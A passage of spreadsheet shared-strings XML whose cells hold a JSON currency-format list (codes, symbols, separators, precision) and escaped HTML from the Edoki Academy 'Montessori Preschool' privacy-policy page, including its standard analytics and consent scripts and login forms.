    <t>","thousand":",","precision":2,"name":"Aruban florin"},{"code":"AZN","symbol":"\u20bc","decimal":". ","thousand":",","precision":2,"name":"Azerbaijani Manat"},{"code":"BAM","symbol":"KM","decimal":",","thousand":".</t>
  </si>
  <si>
    <t>","precision":2,"name":"Bosnia and Herzegovina convertible mark"},{"code":"BBD","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Barbadian dollar"},{"code":"BDT","symbol":"Tk","decimal":".","thousand":",","precision":2,"name":"Bangladeshi Taka"},{"code":"BGN","symbol":"\u043b\u0432","decimal":",","thousand":".","precision":2,"name":"Bulgarian lev"},{"code":"BHD","symbol":"\u062f.\u0628","decimal":".","thousand":",","precision":3,"name":"Bahraini dinar"},{"code":"BIF","symbol":"FBu","decimal":".","thousand":",","precision":0,"name":"Burundian</t>
  </si>
  <si>
    <t>franc"},{"code":"BMD","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Bermudian dollar"},{"code":"BND","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Brunei dollar"},{"code":"BOB","symbol":"$b","decimal":",","thousand":". ","precision":2,"name":"Bolivian boliviano"},{"code":"BRL","symbol":"R$","decimal":",","thousand":". ","precision":2,"name":"Brazilian Real","format":"%s</t>
  </si>
  <si>
    <t>%v"},{"code":"BSD","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Bahamian dollar"},{"code":"BTN","symbol":"Nu. ","decimal":". ","thousand":",","precision":2,"name":"Bhutanese ngultrum"},{"code":"BWP","symbol":"P","decimal":".","thousand":",","precision":2,"name":"Botswana pula"},{"code":"BYN","symbol":"Br","decimal":".</t>
  </si>
  <si>
    <t>","thousand":",","precision":2,"name":"Belarusian ruble"},{"code":"BZD","symbol":"BZ$","decimal":".","thousand":",","precision":2,"name":"Belize dollar"},{"code":"CAD","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Canadian Dollar"},{"code":"CDF","symbol":"FC","decimal":".","thousand":",","precision":2,"name":"Congolese franc"},{"code":"CHF","symbol":"CHF","decimal":". ","thousand":"'","precision":2,"name":"Swiss Franc","format":"%s %v"},{"code":"CLP","symbol":"$","decimal":"","thousand":".</t>
  </si>
  <si>
    <t>","precision":0,"name":"Chilean Peso"},{"code":"CNY","symbol":"\u00a5","decimal":". ","thousand":",","precision":2,"name":"Chinese Yuan"},{"code":"COP","symbol":"$","decimal":".","thousand":",","precision":0,"name":"Colombian Peso"},{"code":"CRC","symbol":"\u20a1","decimal":",","thousand":".</t>
  </si>
  <si>
    <t>","precision":2,"name":"Costa Rican col\u00f3n"},{"code":"CUP","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Cuban peso"},{"code":"CVE","symbol":"$","decimal":".","thousand":",","precision":2,"name":"Cape Verdean escudo"},{"code":"CZK","symbol":"K\u010d","decimal":",","thousand":". ","precision":2,"name":"Czech Koruna","format":"%v %s"},{"code":"DJF","symbol":"Fdj","decimal":".","thousand":",","precision":0,"name":"Djiboutian</t>
  </si>
  <si>
    <t>franc"},{"code":"DKK","symbol":"kr","decimal":".","thousand":",","precision":2,"name":"Danish Krone","format":"%v %s"},{"code":"DOP","symbol":"RD$","decimal":". ","thousand":",","precision":2,"name":"Dominican</t>
  </si>
  <si>
    <t>peso"},{"code":"DZD","symbol":"\u062f\u062c","decimal":",","thousand":". ","precision":2,"name":"Algerian dinar"},{"code":"EGP","symbol":"E\u00a3","decimal":". ","thousand":",","precision":2,"name":"Egyptian pound"},{"code":"ERN","symbol":"Nkf","decimal":".</t>
  </si>
  <si>
    <t>","thousand":",","precision":2,"name":"Eritrean nakfa"},{"code":"ETB","symbol":"Br","decimal":". ","thousand":",","precision":2,"name":"Ethiopian birr"},{"code":"EUR","symbol":"\u20ac","decimal":",","thousand":".","precision":2,"name":"Euro","format":"%v %s"},{"code":"FJD","symbol":"$","decimal":". ","thousand":",","precision":2,"name":"Fijian dollar"},{"code":"FKP","symbol":"\u00a3","decimal":".","thousand":",","precision":2,"name":"Falkland</t>
  </si>
  <si>
    <t>Islands pound"},{"code":"GBP","symbol":"\u00a3","decimal":".","thousand":",","precision":2,"name":"British Pound"},{"code":"GEL","symbol":"\u10da","decimal":",","thousand":". ","precision":2,"name":"Georgian lari"},{"code":"GGP","symbol":"\u00a3","decimal":".","thousand":",","precision":2,"name":"Guernsey pound"},{"code":"GHS","symbol":"GH\u20b5","decimal":".","thousand":",","precision":2,"name":"Ghanaian</t>
  </si>
  <si>
    <t>cedi"},{"code":"GIP","symbol":"\u00a3","decimal":".","thousand":",","precision":2,"name":"Gibraltar pound"},{"code":"GMD","symbol":"D","decimal":".","thousand":",","precision":2,"name":"Gambian dalasi"},{"code":"GNF","symbol":"\u20a3","decimal":".","thousand":",","precision":0,"name":"Guinean franc"},{"code":"GTQ","symbol":"Q","decimal":".","thousand":",","precision":2,"name":"Guatemalan quetzal"},{"code":"GYD","symbol":"G$","decimal":".","thousand":",","precision":2,"name":"Guyanese dollar"},{"code":"HKD","symbol":"HK$","decimal":".</t>
  </si>
  <si>
    <t>","thousand":",","precision":2,"name":"Hong Kong Dollar"},{"code":"HNL","symbol":"L","decimal":". ","thousand":",","precision":2,"name":"Honduran lempira"},{"code":"HRK","symbol":"kn","decimal":".</t>
  </si>
  <si>
    <t>","thousand":",","precision":2,"name":"Croatian kuna"},{"code":"HTG","symbol":"G","decimal":".","thousand":",","precision":2,"name":"Haitian gourde"},{"code":"HUF","symbol":"Ft","decimal":"","thousand":",","precision":0,"name":"Hungarian Forint","format":"%v %s"},{"code":"IDR","symbol":"Rp ","decimal":"","thousand":". ","precision":0,"name":"Indonesian Rupiah"},{"code":"ILS","symbol":"\u20aa","decimal":".</t>
  </si>
  <si>
    <t>","thousand":",","precision":2,"name":"Israeli New Shekel"},{"code":"IMP","symbol":"\u00a3","decimal":". ","thousand":",","precision":2,"name":"Isle of Man pound"},{"code":"INR","symbol":"\u20b9","decimal":".","thousand":",","precision":2,"name":"Indian Rupee"},{"code":"IQD","symbol":"\u062f.\u0639","decimal":".","thousand":",","precision":3,"name":"Iraqi</t>
  </si>
  <si>
    <t>dinar"},{"code":"IRR","symbol":"\u062a\u0648\u0645\u0627\u0646","decimal":".","thousand":",","precision":2,"name":"Iranian rial"},{"code":"ISK","symbol":"kr","decimal":",","thousand":". ","precision":2,"name":"Icelandic kr\u00f3na"},{"code":"JEP","symbol":"\u00a3","decimal":".","thousand":",","precision":2,"name":"Jersey</t>
  </si>
  <si>
    <t>pound"},{"code":"JMD","symbol":"J$","decimal":".","thousand":",","precision":2,"name":"Jamaican Dollar"},{"code":"JOD","symbol":"JD","decimal":".","thousand":",","precision":3,"name":"Jordanian Dinar"},{"code":"JPY","symbol":"\u00a5","decimal":"","thousand":",","precision":0,"name":"Japanese Yen","format":"%s %v"},{"code":"KES","symbol":"KSh","decimal":".","thousand":",","precision":2,"name":"Kenyan shilling"},{"code":"KGS","symbol":"\u043b\u0432","decimal":",","thousand":".</t>
  </si>
  <si>
    <t>","precision":2,"name":"Kyrgyzstani som"},{"code":"KHR","symbol":"\u17db","decimal":".","thousand":",","precision":2,"name":"Cambodian riel"},{"code":"KMF","symbol":"CF","decimal":".","thousand":",","precision":0,"name":"Comorian franc"},{"code":"KPW","symbol":"\u20a9","decimal":".","thousand":",","precision":2,"name":"North</t>
  </si>
  <si>
    <t>Korean won"},{"code":"KRW","symbol":"\uc6d0",</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;title&gt;Montessori Preschool&lt;/title&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"&gt;&lt;meta name="apple-itunes-app" content="app-id=1138436619"&gt;&lt;link rel="shortcut icon" href="/img/montessori-preschool/favicon.ico"&gt;&lt;link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"&gt;&lt;link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"&gt;&lt;link rel="stylesheet" type="text/css" href="/css/montessori-preschool.min.css?v=20221014"&gt;&lt;link rel="apple-touch-icon-precomposed" sizes="144x144" href="/img/ico/apple-touch-icon-144-precomposed.png"&gt;&lt;link rel="apple-touch-icon-precomposed" sizes="114x114" href="/img/ico/apple-touch-icon-114-precomposed.png"&gt;&lt;link rel="apple-touch-icon-precomposed" sizes="72x72" href="/img/ico/apple-touch-icon-72-precomposed.png"&gt;&lt;link rel="apple-touch-icon-precomposed" href="/img/ico/apple-touch-icon-57-precomposed.png"&gt;&lt;script src="/js/dist/montessori-preschool/vendor/jquery-3.2.1.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/detectmobile.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/bootstrap-3.4.1.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/angular-1.6.9.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/angular-animate-1.6.9.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/angular-recaptcha-1.4.0.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/underscore-1.8.3.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/Chart-2.5.0.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/angular-chart-1.1.1.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/async-2.4.0.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/angular-touch-1.6.9.min.js"&gt;&lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/vendor/focus-visible.min.js"&gt;&lt;/script&gt;&lt;script src="https://js.stripe.com/v3"&gt;&lt;/script&gt;&lt;script src="//ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular-cookies.js"&gt;&lt;/script&gt;&lt;script&gt;angular.module('myApp', ['chart.js', 'vcRecaptcha', 'ngAnimate', 'ngTouch', 'ngCookies'])
  .config(function ($locationProvider) {
    $locationProvider.html5Mode({enabled: true, requireBase: false, rewriteLinks: false});
  })
   .run(function ($rootScope, $location) {
    $rootScope.currentLang = "en";
    var montessori = /^\/(montessori-redirect-url)\/?.*$/;
    if (montessori.test($location.path()))
      $location.path($location.path().substr(24));
  });
  &lt;/script&gt;&lt;script src="/js/dist/montessori-preschool/montessori-preschool.min.js?846db44b748db001"&gt;&lt;/script&gt;&lt;script&gt;window.gdprAppliesGlobally=false;(function(){function a(e){if(!window.frames[e]){if(document.body&amp;&amp;document.body.firstChild){var t=document.body;var n=document.createElement("iframe");n.style.display="none";n.name=e;n.title=e;t.insertBefore(n,t.firstChild)}
else{setTimeout(function(){a(e)},5)}}}function e(n,r,o,c,s){function e(e,t,n,a){if(typeof n!=="function"){return}if(!window[r]){window[r]=[]}var i=false;if(s){i=s(e,t,n)}if(!i){window[r].push({command:e,parameter:t,callback:n,version:a})}}e.stub=true;function t(a){if(!window[n]||window[n].stub!==true){return}if(!a.data){return}
var i=typeof a.data==="string";var e;try{e=i?JSON.parse(a.data):a.data}catch(t){return}if(e[o]){var r=e[o];window[n](r.command,r.parameter,function(e,t){var n={};n[c]={returnValue:e,success:t,callId:r.callId};a.source.postMessage(i?JSON.stringify(n):n,"*")},r.version)}}
if(typeof window[n]!=="function"){window[n]=e;if(window.addEventListener){window.addEventListener("message",t,false)}else{window.attachEvent("onmessage",t)}}}e("__tcfapi","__tcfapiBuffer","__tcfapiCall","__tcfapiReturn");a("__tcfapiLocator");(function(e){
var t=document.createElement("script");t.id="spcloader";t.type="text/javascript";t.async=true;t.src="https://sdk.privacy-center.org/"+e+"/loader.js?target="+document.location.hostname;t.charset="utf-8";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n)})("ed15dc3a-3993-4ad5-a4c3-83d42c1bec3a")})();
&lt;/script&gt;&lt;script&gt;var pathArray = window.location.pathname.split( '/' );
var pageCategory = null;
var pageName = null;
if(pathArray[1] === "montessori-redirect-url")
     pathArray.splice(1,1)
if (window.location.href.indexOf("catalog") &gt; -1) {
    pageCategory = "catalog";
    </t>
  </si>
  <si>
    <t xml:space="preserve">pageName = '/' + pathArray[2] + '/' + pathArray[3] + '/home';
} else if(window.location.href.indexOf("account") &gt; -1) {
    pageCategory = "account";
     pageName = '/account/home';
}
else if (window.location.href.indexOf("payment") &gt; -1) {
    pageCategory = "funnel";
    pageName = '/funnel/step1/account';
} /* else if (window.location.href.indexOf("?promo-code=") &gt; -1) {
    pageCategory = "coupon";
    pageName = window.location.pathname + window.location.search;
    console.log(pageName);
}*/ else if(pathArray[2] == "" || pathArray[2] == "login") {
    pageCategory = "home";
    pageName = '/home';
} else if (window.location.href.indexOf("fact-sheets") &gt; -1) {
    pageCategory = "burger-menu";
    pageName = '/burger-menu/fact-sheet';
} else if (window.location.href.indexOf("teachers") &gt; -1) {
    pageCategory = "burger-menu";
    </t>
  </si>
  <si>
    <t>pageName = '/burger-menu/teachers/signup/form'
} else if (window.location.href.indexOf("help") &gt; -1) {
    pageCategory = "burger-menu";
     pageName = '/burger-menu/help/home';
} else if (window.location.href.indexOf("congratulations") &gt; -1) {
    pageCategory = "funnel";
    pageName = '/funnel/step4/confirmation';
}
dataLayer = [{
  'EnvWork' : "production",
  'Language' : "en",
  'UserAuthenticated' : "false" == "true" ? "1" : "0",
  'UserId' : "",
  'PageName' : pageName,
  'PageCategory' : pageCategory
}];
&lt;/script&gt;&lt;script async src="https://www.googletagmanager.com/gtag/js?id=AW-1010235104"&gt;&lt;/script&gt;&lt;script type="didomi/javascript" data-vendor="didomi:google"&gt;window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'AW-1010235104');&lt;/script&gt;&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-KWHZXV4W46"&gt;&lt;/script&gt;&lt;script type="didomi/javascript" data-vendor="didomi:google"&gt;window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-KWHZXV4W46');
&lt;/script&gt;&lt;script type="didomi/javascript" data-vendor="didomi:facebook"&gt;!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '621299325151770');
fbq('track', 'PageView');
&lt;/script&gt;&lt;script type="didomi/javascript" data-vendor="iab:164"&gt;/** DO NOT MODIFY THIS CODE**/
! function(_window, _document) {
  var OB_ADV_ID='00205c0fff62c7a844b85f4f94ece247fa';
  </t>
  </si>
  <si>
    <t>if (_window.obApi) {var toArray = function(object) {return Object.prototype.toString.call(object) === '[object Array]' ? object : [object];};_window.obApi.marketerId = toArray(_window.obApi.marketerId).concat(toArray(OB_ADV_ID));return;}
  var api = _window.obApi = function() {api.dispatch ?</t>
  </si>
  <si>
    <t>api.dispatch.apply(api, arguments) : api.queue.push(arguments);};api.version = '1.1';api.loaded = true;api.marketerId = OB_ADV_ID;api.queue = [];var tag = _document.createElement('script');tag.async = true;tag.src = '//amplify.outbrain.com/cp/obtp.js';tag.type = 'text/javascript';var script = _document.getElementsByTagName('script')[0];script.parentNode.insertBefore(tag, script);}(window, document);
obApi('track', 'PAGE_VIEW');&lt;/script&gt;&lt;noscript&gt;&lt;img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=621299325151770&amp;ev=PageView&amp;noscript=1"/&gt;
&lt;/noscript&gt;&lt;script type="didomi/javascript" data-vendor="c:tiktok-KZAUQLZ9"&gt;!function (w, d, t) {
  w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i&lt;ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(var e=ttq._i[t]||[],n=0;n&lt;ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var i="https://analytics.tiktok.com/i18n/pixel/events.js";ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=i,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};var o=document.createElement("script");o.type="text/javascript",o.async=!0,o.src=i+"?sdkid="+e+"&amp;lib="+t;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(o,a)};
  ttq.load('C29UDO2QV140ORDI8ESG');
  ttq.page();
}(window, document, 'ttq');
ttq.track('ViewContent');&lt;/script&gt;&lt;/head&gt;&lt;body id="" ng-app="myApp" class="main"&gt;&lt;header id="header" ng-controller="HeaderController" class="container"&gt;&lt;nav ng-class="{showPromoBanner:showPromoBanner}" role="navigation" class="navbar navbar-default navbar-fixed-top"&gt;&lt;div id="promo-banner" ng-show="showPromoBanner" ng-cloak class="row"&gt;&lt;h3&gt;&lt;a href="/en{{bannerLink}}"&gt;Get {{bannerCodeDiscount}}off your first subscription order with code {{bannerCode}} at checkout.&lt;/a&gt;&lt;/h3&gt;&lt;button ng-click="hidePromoBanner()" class="close fa fa-window-close"&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="navbar-header"&gt;&lt;a id="logo" href="/en/" class="navbar-brand"&gt;&lt;img id="logoImg" src="/img/montessori-preschool/Montessori_Preschool_logo-en-HD.png" alt="Montessori</t>
  </si>
  <si>
    <t>Preschool logo"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div id="navMain"&gt;&lt;ul id="catalogNav" class="nav navbar-nav navbar-left "&gt;&lt;li&gt;&lt;a href="/en/catalog/maths/"&gt;Catalog&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/edokiClub/"&gt;Edoki Club&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/en/teachers/"&gt;Educators&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/about-us/"&gt;about Edoki&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="/en/our-games/"&gt;More apps&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://edokiacademy.freshdesk.com/en/support/home" target="_blank" rel="noopener"&gt;Help&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul class="nav navbar-nav navbar-right default-nav "&gt;&lt;li id="gift-a-sub-link" ng-show="!hidePaymentButtons" class="sm-show signup"&gt;&lt;a href="/en/give-a-gift/"&gt; &lt;span&gt;&lt;img src="/img/montessori-preschool/gift_button.png" alt=""&gt;&lt;/span&gt;&lt;span&gt;Gift&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li ng-show="!hidePaymentButtons &amp;amp;&amp;amp; ! savedBingeCode &amp;amp;&amp;amp; !savedOutbrainCode" class="sm-show signup"&gt;&lt;a href="/en/payment/"&gt;Start free trial&lt;/a&gt;&lt;/li&gt;&lt;li ng-show="savedBingeCode" class="sm-show signup"&gt;&lt;a href="/en/binge/"&gt;Start free trial&lt;/a&gt;&lt;/li&gt;&lt;li ng-show="savedOutbrainCode" class="sm-show signup"&gt;&lt;a href="/en/outbrain/"&gt;Start free trial&lt;/a&gt;&lt;/li&gt;&lt;li id="preLangNavLogo" class="sm-show"&gt;&lt;a href="#" ng-click="openSideNav('#loginSide')" tabindex="0"&gt;Log in&lt;/a&gt;&lt;/li&gt;&lt;li id="langNavLogo" class="md-show"&gt;&lt;a ng-click="toggleLangNav()" href="" class="fa fa-language"&gt;&lt;/a&gt;&lt;/li&gt;&lt;ul id="langNav" ng-show="langNav" ng-cloak class="sub-nav"&gt;&lt;li class="md-show"&gt;&lt;a href="/en/privacy-policy/"&gt;EN&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/fr/politique-de-confidentialite/"&gt;FR&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/de/privacy-policy/"&gt;DE&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/es/privacy-policy/"&gt;ES&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/pt/privacy-policy/"&gt;PT&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/zh/privacy-policy/"&gt;简体&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/zt/privacy-policy/"&gt;繁體&lt;/a&gt;&lt;/li&gt;&lt;li class="md-show"&gt;&lt;a href="/ko/privacy-policy/"&gt;한국어&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li class="xs-show"&gt;&lt;button id="nav-toggle" type="button" ng-click="toggleSideNav()" class="hamburger hamburger--spring"&gt;&lt;span class="hamburger-box"&gt;&lt;span class="hamburger-inner"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;div id="sideNav" class="sidenav"&gt;&lt;button type="button" ng-click="toggleSideNav()" class="hamburger hamburger--spring is-active sidenav-close"&gt;&lt;span class="hamburger-box"&gt;&lt;span class="hamburger-inner"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;&lt;span id="loginSideNav" ng-click="openSideNav('#loginSide')" class="main account-action action"&gt;Log in&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;a id="gift-a-sub-link-side-nav" href="/en/give-a-gift/"&gt; &lt;span&gt;&lt;img src="/img/montessori-preschool/gift_button.png" alt=""&gt;&lt;/span&gt;&lt;span&gt;Gift&lt;/span&gt;&lt;/a&gt;&lt;div&gt;&lt;div class="col-xs-12"&gt;&lt;a href="/en/catalog/maths" class="main round-button-nav"&gt;Catalog&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&amp;nbsp;&amp;nbsp;&lt;a href="/en/fact-sheets/" class="black"&gt;Fact Sheets&lt;/a&gt;&lt;a href="/en/teachers/" class="black"&gt;Educators&lt;/a&gt;&lt;a href="https://edokiacademy.freshdesk.com/en/support/home" target="_blank" rel="noopener" class="black"&gt;Help&lt;/a&gt;&lt;img src="/img/montessori-preschool/LOGO_MONTESSORI.svg" alt="Montessori Preschool logo" class="montessori-logo"&gt;&lt;a href="/en/about-us/" class="plain"&gt;About us&lt;/a&gt;&lt;a href="/en/privacy-policy/" class="plain"&gt;Privacy Policy&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="/fr/politique-de-confidentialite/" class="plain btn btn-default"&gt;Français&lt;/a&gt;&lt;a href="/de/privacy-policy/" class="plain btn btn-default"&gt;Deutsch&lt;/a&gt;&lt;a href="/es/privacy-policy/" class="plain btn btn-default"&gt;Español&lt;/a&gt;&lt;a href="/pt/privacy-policy/" class="plain btn btn-default"&gt;Português&lt;/a&gt;&lt;a href="/zh/privacy-policy/" class="plain btn btn-default"&gt;简体&lt;/a&gt;&lt;a href="/zt/privacy-policy/" class="plain btn btn-default"&gt;繁體&lt;/a&gt;&lt;a href="/ko/privacy-policy/" class="plain btn btn-default"&gt;한국어&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;div</t>
  </si>
  <si>
    <t>class="copyrightFooter"&gt;&lt;p class="copyHead"&gt;2023 Montessori Preschool&lt;/p&gt;&lt;p class="copy"&gt;Edoki Academy. All rights reserved.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="loginSide" ng-controller="AuthController" class="sidenav"&gt;&lt;button type="button" ng-click="toggleSideNav(); changeView('signin',500);" class="hamburger hamburger--spring is-active sidenav-close"&gt;&lt;span class="hamburger-box"&gt;&lt;span class="hamburger-inner"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;&lt;div ng-show="currentView === 'signin'"&gt;&lt;h2&gt;Sign in&lt;/h2&gt;&lt;form id="login-form" ng-submit="login()" class="form-horizontal"&gt;&lt;div class="validation-control"&gt;&lt;input id="email" type="email" ng-model="user.email" placeholder="E-mail" pattern=".+@.+\..+" title="Parent's email address" class="form-control"&gt;&lt;i class="fa fa-check-circle valid-icon"&gt;&lt;/i&gt;&lt;/div&gt;&lt;input id="pwSide" type="password" ng-model="user.password" placeholder="Password" title="Enter your password" class="form-control"&gt;&lt;div class="row"&gt;&lt;div id="passwordForgotLink" class="col-xs-12 col-sm-6"&gt;&lt;a href="#" ng-click="changeView('forgotPassword')"</t>
  </si>
  <si>
    <t xml:space="preserve">class="plain"&gt;Forgot your password?&lt;/a&gt;&lt;/div&gt;&lt;div class="col-xs-12 col-sm-6"&gt;&lt;button id="submitLoginSide" type="submit" class="btn btn-primary"&gt;Sign in&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/form&gt;&lt;img src="/img/montessori-preschool/loading.gif" ng-show="loading" style="height:100px" alt="Loading icon"&gt;&lt;div id="loginError" ng-show="loginError" class="alert alert-danger"&gt;Wrong account information&lt;/div&gt;&lt;/div&gt;&lt;div id="passwordForgot" ng-show="currentView === 'forgotPassword'"&gt;&lt;h2&gt;Forgot your password?&lt;/h2&gt;&lt;h5&gt;Enter your email account and check your inbox, we will help you reset your password.&lt;/h5&gt;&lt;form id="passwordForgot-form" ng-submit="forgotPassword()" class="form-horizontal"&gt;&lt;div class="validation-control"&gt;&lt;input id="userEmail" type="email" ng-model="user.email" ng-class="{'emailError': emailErrors}" placeholder="E-mail" pattern=".+@.+\..+" title="Parent's email address" class="form-control"&gt;&lt;i ng-hide="emailErrors" class="fa fa-check-circle valid-icon"&gt;&lt;/i&gt;&lt;i ng-show="emailErrors" class="fa fa-exclamation-circle valid-icon"&gt;&lt;/i&gt;&lt;/div&gt;&lt;div vc-recaptcha key="'6LfWGhkTAAAAAAMQeMVqpfEiD0C1p8fynMiFlui5'" lang="currentLang" ng-model="user.recaptchaResponse"&gt;&lt;/div&gt;&lt;div ng-hide="emailErrors || emailSuccess" class="col-xs-12 col-sm-6 col-sm-offset-6"&gt;&lt;button id="submitEmail" type="submit" class="btn btn-primary"&gt;Send&lt;/button&gt;&lt;/div&gt;&lt;img src="/img/montessori-preschool/loading.gif" ng-show="loading" style="height:100px" alt="Loading icon"&gt;&lt;div ng-show="emailErrors" class="emailError"&gt;&lt;div class="col-xs-8 col-xs-offset-2"&gt;&lt;p ng-show="emailErrors[0] === 'errors.email.required'"&gt;Email is required&lt;/p&gt;&lt;p ng-show="emailErrors[0] === 'errors.email.noAccount'"&gt;Nonexistent account with this e-mail address&lt;/p&gt;&lt;p ng-show="emailErrors[0] === 'errors.credentials.captcha'"&gt;Captcha error&lt;/p&gt;&lt;p ng-show="emailErrors === 'server-error'"&gt;Something went wrong. Please try again.&lt;/p&gt;&lt;/div&gt;&lt;div class="col-xs-12 col-sm-6 col-sm-offset-3"&gt;&lt;button id="submitEmailAgain" type="submit" class="btn btn-primary"&gt;Try again&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;div ng-show="emailSuccess" class="emailSuccess"&gt;&lt;p class="emailSuccess"&gt;Please check your inbox in order to reset your password&lt;/p&gt;&lt;p&gt;Don't forget to check your spam folder just in case.&lt;/p&gt;&lt;div class="col-xs-12 col-sm-6 col-sm-offset-3"&gt;&lt;a href="/en/" class="btn btn-info"&gt;Back to home&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&lt;div class="sidenav-footer"&gt;&lt;img src="/img/montessori-preschool/Bus-right_HD.png" alt="" class="bus-pic"&gt;&lt;div class="row"&gt;&lt;div class="col-sm-6 pc-only"&gt;&lt;div class="content"&gt;&lt;h4&gt;Download our new App&lt;/h4&gt;&lt;p&gt;Get ready for school!      </t>
  </si>
  <si>
    <t>&lt;br&gt;&lt;span&gt;Our App is available on Android, iPad and iPhone&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="col-xs-12 col-sm-6"&gt;&lt;div class="content"&gt;&lt;ul class="list-inline app-icons"&gt;&lt;li class="appstore ios"&gt;&lt;a href="https://appsto.re/ca/lOY2db.i?l=en" target="_blank" rel="noopener"&gt;&lt;img src="/img/montessori-preschool/Montessori_Preschool_App-en.png" alt="Apple App Store's logo"&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;img src="https://res.cloudinary.com/sevenacademy/image/upload/h_200,w_200/aboAppIcon_current" alt="Google Play Store's logo"&gt;&lt;/li&gt;&lt;li class="appstore android"&gt;&lt;a href="https://play.google.com/store/apps/details?id=com.edokicademy.montessoriacademy" target="_blank" rel="noopener"&gt;&lt;img src="/img/montessori-preschool/play-en.png" alt="Google Play Store's logo"&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/header&gt;&lt;div id="content"&gt;&lt;div class="wrapper"&gt;&lt;div id="privacyPolicy"&gt;&lt;h1&gt;Privacy Policy and Personal Data protection with Edoki Academy&lt;/h1&gt;&lt;p&gt;Last modified: October 4th, 2021&lt;/p&gt;&lt;h3&gt;Kids Privacy Assured by PRIVO:</t>
